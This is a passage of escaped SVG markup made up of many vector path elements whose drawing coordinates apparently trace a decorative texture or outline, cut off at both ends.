d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n <path 